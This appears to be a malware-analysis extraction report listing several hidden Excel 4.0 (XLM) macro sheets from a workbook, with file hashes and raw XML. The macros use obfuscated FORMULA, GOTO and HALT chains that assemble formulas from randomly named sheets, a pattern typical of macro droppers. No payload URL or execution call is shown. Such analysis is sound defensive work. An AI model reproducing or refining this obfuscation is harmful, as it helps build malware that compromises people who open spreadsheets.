x14ac:dyDescent="0.25"><c r="F16" s="2" t="e"><f>GOTO(H7)</f><v>#N/A</v></c></row><row r="18" spans="8:8" x14ac:dyDescent="0.25"><c r="H18" s="2" t="e"><f>GOTO('8aevgadrg'!G13)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_11.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet11.xml 1929 bytes
SHA-256: d336d714c064b1de9e9a56ccd73ade8b1f0edff76c17a7e66d685ef714ea6d20
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{3109CC0F-EF1F-4DD9-B997-DEE69BAC76DD}"><dimension ref="G15:I22"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="4.5703125" style="2"/><col min="7" max="7" width="5.7109375" style="2" bestFit="1" customWidth="1"/><col min="8" max="8" width="4.5703125" style="2"/><col min="9" max="9" width="9.5703125" style="2" bestFit="1" customWidth="1"/><col min="10" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="15" spans="9:9" x14ac:dyDescent="0.25"><c r="I15" s="2" t="b"><f>FORMULA(G18,I18)</f><v>0</v></c></row><row r="18" spans="7:9" x14ac:dyDescent="0.25"><c r="G18" s="2" t="str"><f>T('3fescvaer'!D8&amp;'5fetaert'!I12)</f><v>=</v></c></row><row r="22" spans="7:9" x14ac:dyDescent="0.25"><c r="G22" s="2" t="e"><f>GOTO(I11)</f><v>#N/A</v></c><c r="I22" s="2" t="e"><f>GOTO('9rrvrv'!H11)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_12.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet12.xml 2195 bytes
SHA-256: aac2ffcbbae09ab4b5869d56560bc65d237d62e10fc10d91608ce8e2b370ca9d
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{21B3E0E8-D60B-4390-95D0-BA0828E3F0C6}"><dimension ref="H15:J21"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="2" width="4.5703125" style="2"/><col min="3" max="3" width="14" style="2" customWidth="1"/><col min="4" max="5" width="4.5703125" style="2"/><col min="6" max="6" width="22.28515625" style="2" customWidth="1"/><col min="7" max="7" width="4.5703125" style="2"/><col min="8" max="8" width="30.140625" style="2" customWidth="1"/><col min="9" max="9" width="7.140625" style="2" customWidth="1"/><col min="10" max="10" width="18.28515625" style="2" customWidth="1"/><col min="11" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="15" spans="10:10" x14ac:dyDescent="0.25"><c r="J15" s="2" t="b"><f>FORMULA(H17,J18)</f><v>0</v></c></row><row r="17" spans="8:10" x14ac:dyDescent="0.25"><c r="H17" s="2" t="str"><f>T('3fescvaer'!D8&amp;'6vrtgarga'!I14)</f><v>=</v></c></row><row r="20" spans="8:10" x14ac:dyDescent="0.25"><c r="J20" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="21" spans="8:10" x14ac:dyDescent="0.25"><c r="H21" s="2" t="e"><f>GOTO(J12)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_13.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 1442 bytes
SHA-256: f132f4041e583271c3d5f2834d2cb24dbe90419bc9d67396179c90ec86cd5770
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{DE64437D-E81C-46EE-855D-0EAFB901A6FF}"><dimension ref="A11"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="9.5703125" style="2" bestFit="1" customWidth="1"/><col min="2" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="11" spans="1:1" x14ac:dyDescent="0.25"><c r="A11" s="2" t="e"><f>GOTO(now!G8)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>